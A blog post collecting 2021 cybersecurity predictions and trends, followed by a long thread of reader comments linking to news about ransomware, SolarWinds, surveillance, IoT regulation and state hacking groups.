Nothing is more difficult than making predictions. For this reason I did not do any “predictions for 2021 cyber security” posting before year 2021 started. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
The State of internet security in 2020 was hard. The trends that stormed last year will continue long to 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year trend was Instead of ‘bring your own device’, these days it’s rather ‘bring your own office’.
2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. 2021 Cybersecurity and IT Failures Roundup article presents you Lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lesson.
Kaspersky’s top three cybersecurity predictions for 2021 are increase in targeted attacks, attacks that are more disruptive exploiting contemporary issues and we will continue to have frequent and significant data breaches. I can pretty much agree on those. Cybersecurity must adapt to counter new threats in a transformed world
Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization, and stagnation. Naturally, the world is moving ahead. We can’t be naive and expect that bad things will not happen along with it. “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”
In 2021 Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad to compromising corporate IT and IoT networks. New Cybersecurity Threat Predictions for 2021 article points out the the traditional network perimeter has been replaced with multiple edge environments, WAN, multi-cloud, data center, remote worker, IoT, and more, each with its unique risks.
DDoS attacks: Big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid bitcoin by a deadline – but victims are being urged not to give in to demands.
One sure bet is that ransomware attacks will only escalate further over this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes, which means that first they encrypt your data so you can’t access it and then they say they will publish your most secret data for other people to see if you don’t pay up. Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data.
Modern cybercrime is becoming increasingly open-sourced which means that already some of the most sophisticated and notorious cybercriminals are utilizing open-source tools to conduct their criminal activities and this will increase.
Trend Micro survey results claim that AI set to replace humans in cybersecurity by 2030. I am just wondering what this claim means and have people who have answered to the survey really understood AI and cyber security? My predictions is that we will need humans and AI and even traditional solutions for a long long time.
The lack of people with cyber security skills is still a problem for many companies because AI will not replace them any time soon. There are different views how the situation has developed. Cybersecurity Skills Shortage Falls for First Time article claims that that shortfall in skills has therefore dropped from 4.07 million last year to 3.12 million. As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that information technology industry has a real problem on its hands – and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for services has dramatically increased. Some companies try to make claims that they have invented a “silver bullet” for educating cyber professionals like This educator claims to have invented an entertaining way to learn cybersecurity. Some of the cyber security issues move to cloud, so we need more people who know security and cloud. The Cloud Talent Drought Continues (And Is Even Larger Than You Thought)
Hackers leverage sophisticated and novel techniques to break into networks article tells that recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents and expect more similar incidents that have not just year been revealed.
Want to avoid having your online accounts hacked? Enable two-factor authentication. Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.
A new version of OWASP Top-10 is coming this year. OWASP Top-10 2021 Statistics-based proposal article tries to make an OWASP Top-10 2021 predictions calculated by understandable metrics, make everyone able to reproduce the results, and present to an entire community for the feedback.
Privacy is an illusion. But that‘s a good thing article says that everyone’s information is available. It doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back and some just don’t care. With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in One Future We have a Private, Anonymous Alternative to Cash but in the Black Mirror Future the Money in Your Pocket Knows Everything About You. Cash is dying that’s for sure. There are still ways to sen anonymous emails and it is a good idea to prepare to your digital life after death.
Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath makes the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom of speech sounding issues like Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.
Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement for consumer IoT designs to have vaguely defined “reasonable security features”. US Government is beginning to create legislation mandating IoT security. The US House of Representatives, for instance, introduced H.R. 1668 – The Internet of Things Cybersecurity Improvement Act of 2020. There are NIST recommendations such as NISTIR 8259 — Foundational Cybersecurity Activities for IoT Device Manufacturers. EU introduces a cyber security IoT standard to protect its citizens and ENISA Publishes Guidelines on Securing the IoT Supply Chain.
7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: Continuous patch management and security updates, OT transparency for IT stakeholders, Natively secure OT network, Cloud-based access to remote sites instead of VPN, Zero touch onboarding, More cybersecurity in small facilities, Certified cybersecurity products and solutions.
IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. 6 essential activities to help developers build in IoT cybersecurity article gives some ideas to improve cyber security in your IoT development.
2,204 Comments
Tomi Engdahl says:
Fools Gold: Questionable Vaccines, Bogus Results, and Forged Cards https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fools-gold-questionable-vaccines-bogus-results-and-forged-cards/
In addition to selling COVID-19 vaccines, vaccination cards, and fake test results, cybercriminals can also benefit by reselling the names, dates of birth, home addresses, contact details, and other personally indefinable information of their customers.
Tomi Engdahl says:
CIS Controls Version 8
https://www.cisecurity.org/controls/v8/
CIS Controls v8 has been enhanced to keep up with modern systems and software. Movement to cloud-based computing, virtualization, mobility, outsourcing, Work-from-Home, and changing attacker tactics prompted the update and supports an enterprise’s security as they move to both fully cloud and hybrid environments.
Tomi Engdahl says:
Israel bombed two Hamas cyber targets
https://therecord.media/israel-bombed-two-hamas-cyber-targets/
According to the official Israel Air Force Twitter account, the first strike hit a cyber-equipment storage site in the northern Gaza Strip belonging to Hamas military intelligence that was apparently being used as an impromptu data center.
Tomi Engdahl says:
https://therecord.media/solarwinds-ceo-apologizes-for-blaming-an-intern-says-attack-may-have-started-in-january-2019/
On the topic of the breach itself, [CEO] Ramakrishna also gave additional details about the timeline of the attack. The group behind the compromise, which the U.S. government has attributed to Russias foreign intelligence service, may have been in our environment as early as jan 2019 doing very early recon activities, Ramakrishna said.
The company has said that it believed hackers . initially accessed SolarWinds systems as early as September 2019.
Tomi Engdahl says:
And they only want 10years experience and a masters.
U.S. has almost 500,000 job openings in cybersecurity
https://www.cbsnews.com/news/cybersecurity-job-openings-500k/
Help wanted: thousands and thousands of people interested in a career in cybersecurity.
There are about 465,000 open positions in cybersecurity nationwide as of May 2021, according to Cyber Seek — a tech job-tracking database from the U.S. Commerce Department — and the trade group CompTIA.
The need for more web watchmen spans from private businesses to government agencies, experts say, and most of the job openings are in California, Florida, Texas and Virginia. That means for anyone looking to switch careers and considering a job in cybersecurity, there’s no greater time than now to find work, the job trackers said.
Tomi Engdahl says:
The Pfizer-BioNTech vaccine is a top target of conspiracy theories
https://www.cbsnews.com/news/covid-vaccine-pfizer-conspiracy-theories/
The Pfizer-BioNTech coronavirus vaccine became a target of conspiracy theories and disinformation campaigns as soon as it was announced, reaching millions of people on sites like Twitter, Reddit and 4chan, according to a recent analysis from a cyber defense firm.
COVID-19 conspiracy narratives, like the false belief that the vaccine was delayed for political reasons, flourished on social networks in the fall and early winter, according to the New York tech security firm Blackbird.
These bogus notions about the vaccines, amplified by a relatively small number of fake accounts and real influencers, reached millions of people, Khaled said.
“Bots and influencers work in tandem,” he explained. “We can’t prove if they collude behind the scenes, but social media data shows clearly that they influence each other by sharing the same links, repeating the same phrases, tagging the same accounts and jumping in on trending hashtags.”
For example, some botnets reach real influencers by spamming conspiracy links to trending hashtags. Another common tactic is to generate fake trends by synchronizing hundreds of posts using similar anti-vaccine and pseudoscientific claims.
One common tactic is to co-opt trending topics by spamming content with provocative rhetoric that is intended to encourage engagement. This helps raise the visibility and reach of a piece of content, which increases the likelihood that a politically aligned influencer will further share the content. The content gains momentum by muddying the waters between facts and falsehoods.
Tomi Engdahl says:
China could soon have stronger privacy laws than the U.S.
https://www.protocol.com/china/china-privacy-laws-surpass-usa
In late April, China unveiled the second draft of the country’s privacy law, the Personal Information Protection Law, for public comment. The law is expected to pass by the end of the year, and would shield Chinese internet users from excessive data collection and misuse of personal data by tech companies and even, to some extent, by the government.
Tomi Engdahl says:
The Full Story of the Stunning RSA Hack Can Finally Be Told https://www.wired.com/story/the-full-story-of-the-stunning-rsa-hack-can-finally-be-told/
In 2011, Chinese spies stole the crown jewels of cybersecuritystripping protections from firms and government agencies worldwide. Heres how it happened.
Tomi Engdahl says:
Hetzner cloud server provider bans cryptocurrency mining https://www.bleepingcomputer.com/news/cryptocurrency/hetzner-cloud-server-provider-bans-cryptocurrency-mining/
“With storage boxes this leads to problems with the bandwidth on the host systems. With chia mining there is also the problem that the hard drives are extremely stressed by the many read and write processes and will therefore break.”
Tomi Engdahl says:
Craig Federighi says the Mac has an unacceptable malware problem https://9to5mac.com/2021/05/19/craig-federighi-mac-malware-problem/
As detailed earlier this afternoon, Craig Federighi is currently testifying during the Apple vs. Epic lawsuit. While facing questioning from Apples lawyers, Federighi made some interesting comments about security, particularly noting that the Mac currently has a level of malware that Apple does not find acceptable.
Tomi Engdahl says:
Look how many cybercriminals love Cobalt Strike http://www.intel471.com/blog/cobalt-strike-cybercriminals-trickbot-qbot-hancitor
Despite the obfuscation techniques, Intel 471 has collected a wealth of information on how the cybercrime underground has refashioned this security tool to its advantage. The following takes a deeper look at which threat actor groups and malware families are dropping Cobalt Strike for post-exploitation.
Tomi Engdahl says:
DHS announces program to mitigate vulnerabilities below the operating system https://www.scmagazine.com/home/security-news/vulnerabilities/dhs-announces-program-to-mitigate-vulnerabilities-below-the-operating-system/
Officials from the Cybersecurity and Infrastructure Security Agency announced a new initiative to fight firmware vulnerabilities at the RSA Conference Wednesday afternoon.. In cybersecurity, we spend the majority of our time observing, analyzing, and responding to vulnerabilities in operating systems, and at the application layer, said Rohner. And yet, there are categories of vulnerabilities lurking beneath the proverbial surface that we arent dealing with through our vulnerability research efforts and our incident response activities.
Tomi Engdahl says:
https://go.recordedfuture.com/hubfs/cta-2021-0520.pdf
The sharing of information, tools, and manuals by threat actors on dark web forums allows fraudsters to learn tips and tricks from one another and to continue to refine their techniques to successfully engage with victims. This also lowers the barrier of entry so that even novice threat actors can successfully participate in dating fraud.
Tomi Engdahl says:
SimuLand: Understand adversary tradecraft and improve detection strategies https://www.microsoft.com/security/blog/2021/05/20/simuland-understand-adversary-tradecraft-and-improve-detection-strategies/
SimuLand is an open-source initiative by Microsoft to help security researchers around the world deploy lab environments that reproduce well-known techniques used in real attack scenarios, actively test and verify the effectiveness of related Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections, and extend threat research using telemetry and forensic artifacts generated after each .
simulation exercise.
Tomi Engdahl says:
Traficom määritteli kriittiset verkkoelementit – myös 4G- ja 5G-verkkojen osalta
https://www.uusiteknologia.fi/2021/05/21/traficom-maaritteli-kriittiset-verkkoelementit-myos-4g-ja-5g-verkkojen-osalta/
Liikenne- ja viestintävirasto Traficom on määritellyt viestintäverkkojen kriittiset osat aiempaa tarkemmin, kertoo Tietoturva Nyt -sivusto. Kriittiset osat määritellään teknologianeutraalisti, mutta niitä on täydennetty 4G- ja 5G-verkkojen osalta. Vaikka Huaweita ei mainita nimeltä, taustalla vaikuttanee määrityksiin myös amerikkalaisepäillyt kiinalaisvalmistajan 5G-tekniikan käytöstä.
Taustaa: Voimassa olevan sähköisen viestinnän palveluista annetun lain (917/2014) eli viestintäpalvelulain 244 a §:n mukaan viestintäverkkolaitetta ei saa käyttää yleisen viestintäverkon kriittisissä osissa, jos on painavia perusteita epäillä, että laitteen käyttäminen vaarantaisi kansallista turvallisuutta tai maanpuolustusta. Tämä käyttökielto koskee tilanteita, joissa käytöllä mahdollistettaisiin ulkomainen tiedustelutoiminta tai toiminta, jolla häirittäisiin, lamautettaisiin tai muuten vahingollisella tavalla vaikutettaisiin Suomen tärkeisiin etuihin, yhteiskunnan perustoimintoihin tai kansanvaltaiseen yhteiskuntajärjestykseen. Pykälä tuli voimaan vuoden 2021 alusta.
https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/traficom-maarittelee-viestintaverkon-kriittiset-osat
https://www.traficom.fi/fi/saadokset?group=kyberturvallisuus&limit=20&offset=0&query=&sort=created&toggle=M%C3%A4%C3%A4r%C3%A4ys%20viestint%C3%A4verkon%20kriittisist%C3%A4%20osista
Tomi Engdahl says:
Amazon’s Ring is the largest civilian surveillance network the US has ever seen
Lauren Bridges
https://www.theguardian.com/commentisfree/2021/may/18/amazon-ring-largest-civilian-surveillance-network-us
One in 10 US police departments can now access videos from millions of privately owned home security cameras without a warrant
In a 2020 letter to management, Max Eliaser, an Amazon software engineer, said Ring is “simply not compatible with a free society”. We should take his claim seriously.
Ring video doorbells, Amazon’s signature home security product, pose a serious threat to a free and democratic society. Not only is Ring’s surveillance network spreading rapidly, it is extending the reach of law enforcement into private property and expanding the surveillance of everyday life. What’s more, once Ring users agree to release video content to law enforcement, there is no way to revoke access and few limitations on how that content can be used, stored, and with whom it can be shared.
Ring is effectively building the largest corporate-owned, civilian-installed surveillance network that the US has ever seen. An estimated 400,000 Ring devices were sold in December 2019 alone, and that was before the across-the-board boom in online retail sales during the pandemic. Amazon is cagey about how many Ring cameras are active at any one point in time, but estimates drawn from Amazon’s sales data place yearly sales in the hundreds of millions.
Then there’s this: since Amazon bought Ring in 2018, it has brokered more than 1,800 partnerships with local law enforcement agencies, who can request recorded video content from Ring users without a warrant. That is, in as little as three years, Ring connected around one in 10 police departments across the US with the ability to access recorded content from millions of privately owned home security cameras. These partnerships are growing at an alarming rate.
in the past year through the end of April 2021, law enforcement have placed more than 22,000 individual requests to access content captured and recorded on Ring cameras.
Ring’s pervasive network of cameras expands the dragnet of everyday pre-emptive surveillance – a dragnet that surveils anyone who passes into its gaze, whether a suspect in a crime or not. Although the dragnet indiscriminately captures everyone, including children, there are obvious racial, gendered and class-based inequities when it comes to who is targeted and labelled as “out of place” in residential space.
Tomi Engdahl says:
‘You Can’t Just Concede.’ How One Expert Explains Negotiating With Cybercriminals
https://www.npr.org/2021/05/18/997549334/you-cant-just-concede-how-one-expert-explains-negotiating-with-cybercriminals
Thousands of institutions fall victim to ransomware attacks each year in the U.S., including local governments, small businesses, schools, hospitals, airports and more. Law enforcement discourages paying the extortionists, but many businesses do. Surveys suggest at least a quarter of victims pay up, with payments often in the tens or even hundreds of thousands of dollars.
Data is spotty, though, because many companies don’t report attacks. And even if they pay, there’s no guarantee they’ll recover all their data.
So when businesses are attacked with ransomware, one of the people they call is Bill Siegel, CEO of Coveware. The company collects data on ransomware attacks, helps victims respond to attacks and often negotiates with hackers.
“It’s not a foregone conclusion that a company has to pay a ransom,” he says. Large companies may need days to figure out whether their data is safely backed up. They can start talking just to buy time. “We’ll kick off negotiation, knowing that a very likely outcome is that we actually don’t end up paying.”
Tomi Engdahl says:
Näin huijarit VÄÄRENTÄVÄT! VARO TÄTÄ YLEISTYVÄÄ HUIJAUSTA!
https://www.youtube.com/watch?v=1z8o_E_eWRg
Tällä videolla näytän käytännössä miten huijarit tällä hetkellä huijaavat! Kuittiväärennöksiä ja silmänkääntötemppuja verkkopankissa. Näitä on mahdoton huomata!
Tomi Engdahl says:
Growing Mystery of Suspected Energy Attacks Draws US Concern
https://www.securityweek.com/growing-mystery-suspected-energy-attacks-draws-us-concern
The Biden administration is facing new pressure to resolve a mystery that has vexed its predecessors: Is an adversary using a microwave or radio wave weapon to attack the brains of U.S. diplomats, spies and military personnel?
The number of reported cases of possible attack is sharply growing and lawmakers from both parties, as well as those believed to be affected, are demanding answers. But scientists and government officials aren’t yet certain about who might have been behind any attacks, if the symptoms could have been caused inadvertently by surveillance equipment — or if the incidents were actually attacks.
Whatever an official review concludes could have enormous consequences. Confirmation that a U.S. adversary has been conducting damaging attacks against U.S. personnel would unleash calls for a forceful response by the United States.
Tomi Engdahl says:
Microsoft Unveils SimuLand: Open Source Attack Techniques Simulator
https://www.securityweek.com/microsoft-unveils-simuland-open-source-attack-techniques-simulator
Microsoft this week announced the availability of SimuLand, an open source tool that enables security researchers to reproduce attack techniques in lab environments.
The purpose of SimuLand, Microsoft says, is to help understand the behavior and functionality of threat actors’ tradecraft, to find mitigations and validate existing detection capabilities, and to identify and share data sources relevant to adversary detection.
SimuLand can be used to test the effectiveness of Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections.
Furthermore, it is expected to help accelerate the building and deployment of threat research lab environments and to enable security researchers to stay up to date with the techniques and tools that threat actors employ in real-world attacks.
“Our goal is to have SimuLand integrated with threat research methodologies where dynamic analysis is applied to end-to-end simulation scenarios,” Microsoft says.
Based on open-source projects such as Azure Sentinel2Go and the Open Threat Research (OTR) community’s Blacksmith and featuring a modular design, SimuLand can be used to test various combinations of attack actions and also includes guides for lab deployment and for executing simulation exercises.
https://github.com/Azure/SimuLand
Tomi Engdahl says:
Lessons Learned From High-Profile Exploits
https://www.securityweek.com/lessons-learned-high-profile-exploits
In 2020, malicious actors took full advantage of the expanded threat landscape created by the increase in remote work. We saw the reappearance of older malware targeting older, unpatched devices in home networks, a seven-fold increase in ransomware attacks, and one of the most significant supply chain hacks in recent years. And so far, 2021 is following that theme with the recent attempts by cyber adversaries using a variety of attacks to exploit several Microsoft Exchange Server vulnerabilities and a continued assault with ransomware.
Given the rapid expansion of the potential attack surface, the interconnection of devices and data across a larger digital environment, and the inconsistent and fragmented approach to security taken by many organizations, cybersecurity risk has never been greater. As the saying goes, there’s no rest for the weary—and the recent spate of ransomware and other attacks looking to exploit newly revealed critical system vulnerabilities are just the latest in an escalating campaign by increasingly motivated and sophisticated criminals. And that means cybersecurity professionals have to stay vigilant and prepared.
Tomi Engdahl says:
A Renewed Push to Improve the Nation’s Cybersecurity
https://www.securityweek.com/renewed-push-improve-nations-cybersecurity
Biden’s Executive Order to improve the nation’s cybersecurity is a good first step, but it is unlikely to materially change the defensive posture of the nation
In response to recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline ransomware attack, President Biden on May 12, 2021 signed an Executive Order (EO) to improve the nation’s cybersecurity and protect federal government networks. For close observers, this seems to be like Groundhog Day, as past incoming administrations have issued similar executive orders to address insufficient cybersecurity defenses that leave public and private sector entities vulnerable to attacks. The National Institute of Standards and Technology (NIST) Cybersecurity Framework and the Department of Homeland Security’s Continuous Diagnostic and Mitigation (CDM) Program are good examples of past attempts to strengthen the federal government’s security posture and improve cyber resilience. The big question is whether the proposed actions in this new EO are attainable.
Tomi Engdahl says:
Android 12 will give you more control over how much data you share with apps https://android-developers.googleblog.com/2021/05/android-security-and-privacy-recap.html
New Android release will give users more transparency around the data being accessed by apps. Android is also investing in reducing the scope of permissions so that apps only have access to the data they need for the features they provide. Let’s look at some of these important changes we’ve made in Android 12 to protect user privacy.
Tomi Engdahl says:
Crypto-mining gangs are abusing the free tiers of cloud computing platforms https://therecord.media/crypto-mining-gangs-are-running-amok-on-free-cloud-computing-platforms/
Gangs have been operating by registering accounts on selected platforms, signing up for a free tier, and running a cryptocurrency mining app on the provider’s free tier infrastructure.
Tomi Engdahl says:
Privacy in the time after cookies – Google Chrome’s new FLoC tracking https://www.forbes.com/sites/zakdoffman/2021/05/01/stop-using-google-chrome-on-your-iphone-android-macbook-and-pc/
Now that end of the third party cookie era is coming to an end, other tracking methods are being experimented with. Zak Doffman discusses in detail what kind of privacy impact Chrome’s new FLoC tracking has.
Tomi Engdahl says:
Serverless Phishing Campaign
https://isc.sans.edu/diary/%22Serverless%22+Phishing+Campaign/27446
Usually most attackers deploy their phishing kits on servers, this one includes an obfuscated html phishing page attached in the mail. Xavier Mertens, Senior ISC Handler, analyses the method in the InfoSec handlers diary blog.
Tomi Engdahl says:
PowerShell Is Source of More Than a Third of Critical Security Threats https://www.esecurityplanet.com/threats/powershell-source-of-third-of-critical-security-threats/
PowerShell was the source of more than a third of critical threats detected on endpoints in the second half of 2020, according to a Cisco research study released at the RSA Conference.
Tomi Engdahl says:
Belgium approves new cyber strategy with emphasis on essential institutions https://therecord.media/belgium-approves-new-cyber-strategy-with-emphasis-on-essential-institutions/
After Belgium’s parliament, universities, and scientific institutions were hit by a cyberattack, a new cybersecurity strategy has been approved. Six strategic areas they are focusing on are: investing in secure network infrastructure; raising awareness of cybersecurity threats; protecting vital institutions; deterring cyberattacks; improving public, private, and academic partnerships; and articulating a clear international commitment to the issue.
Tomi Engdahl says:
Everything you ever wanted to know about DNS and more!
https://isc.sans.edu/forums/diary/New+YouTube+Video+Series+Everything+you+ever+wanted+to+know+about+DNS+and+more/27440/
It’s not DNS. There’s no way it’s DNS. It was DNS. New video series from SANS ISC describes in the inner workings of DNS and walks you through some of the DNS problems.
Tomi Engdahl says:
Cyber Insurance Is Not a Substitute for Cybersecurity https://www.crowdstrike.com/blog/why-cyber-insurance-is-not-a-substitute-for-cybersecurity/
Attacks are increasing in frequency, ransom demands are rising and the cyber insurance industry has reached a crossroad where cyber insurance cannot be used by victims of a ransomware attack as a substitute for inadequate cybersecurity solutions and practices
Tomi Engdahl says:
Subscription ransomware – Zeppelin ransomware comes back to life https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-comes-back-to-life-with-updated-versions/
The developers of Zeppelin ransomware have resumed their activity after a period of relative silence that started last Fall and started to advertise new versions of the malware. Earning model of the ransomware is a bit more interesting, in a way that it includes providing a cut to the developers and subscription model for regular customers.
Tomi Engdahl says:
VPN Android apps: What you should know
https://newsblur.com/site/6289490/malwarebytes-labs
In just the past year, free VPN for Android apps have exposed the data of as many as 41 million users. Investigations into one of those free VPN Android apps also revealed that it may have been part of a larger web of Android VPNs all operating under the same company.
Tomi Engdahl says:
Key Takeaway from the Colonial Pipeline Attack https://blogs.cisco.com/security/key-takeaway-from-the-colonial-pipeline-attack
In the Cisco Blog Vikram Sharma describes the colonial pipeline attack and some measures that could have helped prevent the attack
Tomi Engdahl says:
Hack, Disinform, Deny: Russia’s Cybersecurity Strategy
https://www.securityweek.com/hack-disinform-deny-russias-cybersecurity-strategy
Over the years, Moscow has faced numerous allegations of cyberattacks that resulted in multiple sanctions and the expulsion of its diplomats. The term “hacker” has almost become synonymous with Russia.
From “troll factories” to hackers allegedly controlled by the country’s security services, here is an overview of the world of Russian cybercrimes
Tomi Engdahl says:
https://etn.fi/index.php/13-news/12178-tutkimus-mobiilisovellukset-vuotavat-tietojasi
Tomi Engdahl says:
Uncovering Shenanigans in an IP Address Block via Hurricane Electric’s BGP Toolkit
https://isc.sans.edu/diary/rss/27456
InfoSec Handlers tip from Yee Ching Tok on using the excellent HE BGP Toolkit on networks to find malicious phishing sites
Tomi Engdahl says:
The Rise of Continuous Attack Surface Management
https://www.securityweek.com/rise-continuous-attack-surface-management
In the merry-go-round world of InfoSec technologies and “what’s old is new again,” this year we should include Attack Surface Management with a dash of Continuous.
Twenty years ago, the first commercial “ethical hacking” training courses taught defenders the mystic arts and methodologies of targeted intrusion. Back then, a lengthy opening chapter would cover the ethics of hacking and the legal consequences of employing the skills students were about to learn. It wasn’t until chapter two that students got to roll up their sleeves and learn through doing — beginning with passive information gathering and enumerating the attack surface of a target (typically the student’s own employer).
Any technical CISO and greying SecOps professional worth their salt can recollect their first ethical hacking experience and foray into mapping the attack surface of their business and being both excited and shocked at the long list of security-related findings they had uncovered with their own hands.
Two decades later, as businesses expand upon their digital transformation investments, their internet-exposed surface has grown exponentially and with it so too have the vectors for attack. In an increasingly cloudified world, identifying what business systems are publicly accessible and what confidential insights or vulnerabilities they may expose has risen to critical importance. Ad hoc point-in-time enumerations of an organization’s external attack surface are being superseded by continuous attack surface management (CASM).
Although CASM is a new label, there’s already a mix of several dozen old and new startup companies focused on external attack surface enumeration and public asset attribution — with an array of integration options into existing threat intelligence platforms (TIP), vulnerability assessment management (VAM) systems, cloud security posture management (CSPM) and SIEM solutions. Although diverse in their offerings, vendors can be roughly divided into three value propositions:
1. “Traditional” external attack security enumerators that focus on cyclically mapping and inventorying the entire internet, often with limited attribution or asset ownership insights. Their data tends to be most useful and consumable from a TIP perspective.
2. Digital Risk Protection services that fuse attack surface information with other intelligence sources (e.g., dark web monitoring) to provide customers with enterprise risk insights. Often delivered as part of brand protection and fraud campaign detection services.
3. Continuous automated external testing of an enterprise’s (known) assets for an outside-in and attacker’s perspective for the prioritization of vulnerability and asset remediation (often as part of VAM).
Tomi Engdahl says:
Report Highlights Massive Scale of Automated Cyberattacks
https://www.securityweek.com/report-highlights-massive-scale-automated-cyberattacks
Gartner first gave name to the Secure Access Service Edge (SASE) model, effectively defining it. SASE combines WAN and security as a cloud service.
In 2019, Gartner wrote, “SASE is a new package of technologies including SD-WAN, SWG, CASB, ZTNA and FWaaS as core abilities, with the ability to identity sensitive data or malware and the ability to decrypt content at line speed, with continuous monitoring of sessions for risk and trust levels.”
Since that time, major security firms have been developing or acquiring SASE capabilities to build into their own platforms, leaving Cato Networks as one of the first and few pure SASE firm.
On March 25, 2021, Gartner wrote, “By 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”
Tomi Engdahl says:
Operating in the Shadows: US Cyber Command
https://www.securityweek.com/operating-shadows-us-cyber-command
Tomi Engdahl says:
Gartner: Global Security Spending Will Reach $150 Billion in 2021
https://www.securityweek.com/gartner-global-security-spending-will-reach-150-billion-2021
Research and advisory giant Gartner predicts that global security and risk management spending will exceed $150 billion this year.
The company forecasts that information security and risk management will grow by more than 12 percent in 2021. Spending in these segments increased by more than 6 percent in 2020.
Gartner says nearly half of the total, roughly $72 billion, will be spent on security services, including consulting, hardware support, and implementation and outsourced services. Significant amounts of money will also be invested in infrastructure protection ($24 billion), network security equipment ($17 billion), and identity access management ($14 billion).
The company believes less than a billion will be spent on cloud security, which it described as the “smallest but fastest growing market segment.”
Tomi Engdahl says:
OT Systems Increasingly Targeted by Unsophisticated Hackers: Mandiant
https://www.securityweek.com/ot-systems-increasingly-targeted-unsophisticated-hackers-mandiant
Unsophisticated threat actors — in many cases motivated by financial gain — have increasingly targeted internet-exposed operational technology (OT) systems, according to research conducted by Mandiant, FireEye’s threat intelligence and incident response unit.
There are a handful of public reports of attacks on industrial control systems (ICS) causing significant physical damage or disruption. These attacks are typically launched by sophisticated and well-funded threat groups.
Tomi Engdahl says:
Kaspersky Security Bulletin 2020-2021 – EU statistics https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/
Tomi Engdahl says:
Guidance on Strengthening the Code of Practice on Disinformation https://digital-strategy.ec.europa.eu/en/library/guidance-strengthening-code-practice-disinformation
The EU Commission publishes its guidance on how the Code of Practice on Disinformation, the first of its kind worldwide, should be strengthened to become a more effective tool for countering disinformation. Full report as PDF:
https://ec.europa.eu/newsroom/dae/redirection/document/76495
Tomi Engdahl says:
Ovatko suomalaiset yritykset valmiita älylaitteiden tietoturvavaatimuksiin?
https://www.epressi.com/tiedotteet/teknologia/ovatko-suomalaiset-yritykset-valmiita-alylaitteiden-tietoturvavaatimuksiin.html
Älylaitteiden tietoturva mietityttää laitevalmistajia, laitemyyjiä ja kuluttajia. Suomessa otettiin käyttöön vapaaehtoinen älylaitteiden tietoturvallisuudesta kertova Tietoturvamerkki vuoden 2019 lopussa.
Tomi Engdahl says:
‘World’s Leading Bank Robbers’: North Korea’s Hacker Army
https://www.securityweek.com/worlds-leading-bank-robbers-north-koreas-hacker-army
Nuclear-armed North Korea is advancing on the front lines of cyberwarfare, analysts say, stealing billions of dollars and presenting a clearer and more present danger than its banned weapons programmes.
Pyongyang is under multiple international sanctions over its atomic bomb and ballistic missile programmes, which have seen rapid progress under North Korean leader Kim Jong Un.
But while the world’s diplomatic focus has been on its nuclear ambitions, the North has been quietly and steadily building up its cyber capabilities, and analysts say its army of thousands of well-trained hackers are proving to be just as dangerous.
“North Korea’s nuclear and military programmes are long-term threats, but its cyber threats are immediate, realistic threats,” said Oh Il-seok, a researcher at the Institute for National Security Strategy in Seoul.
Pyongyang’s cyberwarfare abilities first came to global prominence in 2014 when it was accused of hacking into Sony Pictures Entertainment as revenge for “The Interview”, a satirical film that mocked leader Kim.
The attack resulted in the posting of several unreleased movies online as well as a vast trove of confidential documents.
Since then the North has been blamed for a number of high-profile cyberattacks, including a $81 million heist from the Bangladesh Central Bank as well as the 2017 WannaCry global ransomware attack, which infected some 300,000 computers in 150 nations.
Tomi Engdahl says:
US Exchanges Offer a Rich Potential Target for Hackers
https://www.securityweek.com/us-exchanges-offer-rich-potential-target-hackers
Cyberattacks have long been seen as a threat to financial markets, but worries are becoming even more acute following a US pipeline hack that set off a public panic and forced the company to pay a ransom.
Financial exchanges that manage daily transactions of tens or hundreds of billions of dollars are an appealing target for hackers.
Major stock exchanges insist they are on top of the issue, but remain mum about what steps they are taking to safeguard their networks.
“Technology and operational resiliency sits at the heart of everything we do,” a Nasdaq spokesperson told AFP.
Likewise, the Chicago Board Options Exchange “takes cybersecurity very seriously and does not discuss our cyber defenses publicly,” an exchange spokesperson said.
Tomi Engdahl says:
Inside the surveillance software tracking child porn offenders across the globe
The Child Protection System helps police triage child pornography cases. But as the system expands, it’s facing growing privacy concerns.
https://www-nbcnews-com.cdn.ampproject.org/c/s/www.nbcnews.com/news/amp/ncna1234019
Tomi Engdahl says:
What Cybersecurity Can Learn From Video Games
https://www.securityweek.com/what-cybersecurity-can-learn-video-games
